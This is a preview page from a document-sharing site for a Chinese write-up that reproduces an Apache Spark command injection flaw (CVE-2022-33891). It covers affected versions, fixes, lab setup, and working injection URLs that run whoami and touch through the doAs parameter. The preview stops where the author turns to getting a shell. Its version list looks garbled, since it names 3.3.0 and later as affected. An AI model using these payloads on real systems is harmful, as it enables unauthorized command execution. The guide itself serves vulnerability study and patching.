没有合适的资源?快使用搜索试试~ 我知道了~
Apache Spark 命令注入(CVE-2022-33891)格式化文档
需积分: 40 7 下载量 173 浏览量
2022-08-10
17:28:00
上传
评论
收藏 2.46MB DOCX 举报
温馨提示
试读
18页
Apache Spark 命令注入(CVE-2022-33891)格式化文档 Apache Spark 命令注入(CVE-2022-33891)漏洞复现 CVE-2022-33891POC Apache Spark 命令注入(CVE-2022-33891)POC CVE-2022-33891 影响版本 Apache spark version<3.0.3 3.1.1<Apache spark 版本<3.1.2 Apache Spark version>= 3.3.0 修复方案 1.建议升级到安全版本,参考官网链接: https://spark.apache.org/downloads.html 2.安全设备路径添加黑名单或者增加WAF规则(临时方案)。
资源推荐
资源详情
资源评论
Apache Spark 命令注入
(CVE-2022-33891)
# 漏洞编号
```bash
CVE-2022-33891
```
# 影响版本
```bash
Apache spark version<=3.0.3
3.1.1=<Apache spark 版本<=3.1.2
Apache Spark version>= 3.3.0
```
# 环境搭建
## 下载编译包 3.0.3 版本
下载 spark3.0.3 编译包:
```bash
https://archive.apache.org/dist/spark/spark-3.0.3/spark-3.0.3-bin-hadoop3.2.tg
z
```
linux 直接用 wget 下载
```bash
wget
https://archive.apache.org/dist/spark/spark-3.0.3/spark-3.0.3-bin-hadoop3.2.tgz
```
## 解压编译包:
下载编译包之后,解压编译包
```bash
tar -zxvf spark-3.0.3-bin-hadoop3.2.tgz
```
名字太长了,给他改个名字,就用 mv 命令改吧
```bash
mv spark-3.0.3-bin-hadoop3.2 spark-local
```
切换到解压包目录下
cd spark-local
## 执行:
启动 Apache spark 项目(需要开启 spark.acls.enable)
```bash
./bin/spark-shell --conf spark.acls.enable=true
```
## 打开连接即可
启动服务后,会有 web 页面的地址,打开即可,可看上面的那张图片
```bash
http:ip:4040
```
# 代码注入漏洞复现:
## 复现步骤
在 url 后拼接如下命令即可
```bash
?doAs=`要执行的命令`
```
## 执行 whoami
```bash
http://192.168.13.133:4040/jobs/?doAs=`whoami`
```
发现页面无回显,无法验证漏洞的存在,尝试创建文件来进行验证
## 创建 txt 文件
```bash
http://192.168.13.131:4040/jobs/?doAs=`touch%20/a.txt`
```
页面依然没有回显。
去后台查看,发现 a.txt 已经被创建,发现代码被成功执行,也就是说存在该漏
洞。
验证了漏洞存在,我们尝试 getshell
剩余17页未读,继续阅读
资源评论
_PowerShell
- 粉丝: 5w+
- 资源: 83
上传资源 快速赚钱
- 我的内容管理 展开
- 我的资源 快来上传第一个资源
- 我的收益 登录查看自己的收益
- 我的积分 登录查看自己的积分
- 我的C币 登录后查看C币余额
- 我的收藏
- 我的下载
- 下载帮助
安全验证
文档复制为VIP权益,开通VIP直接复制
信息提交成功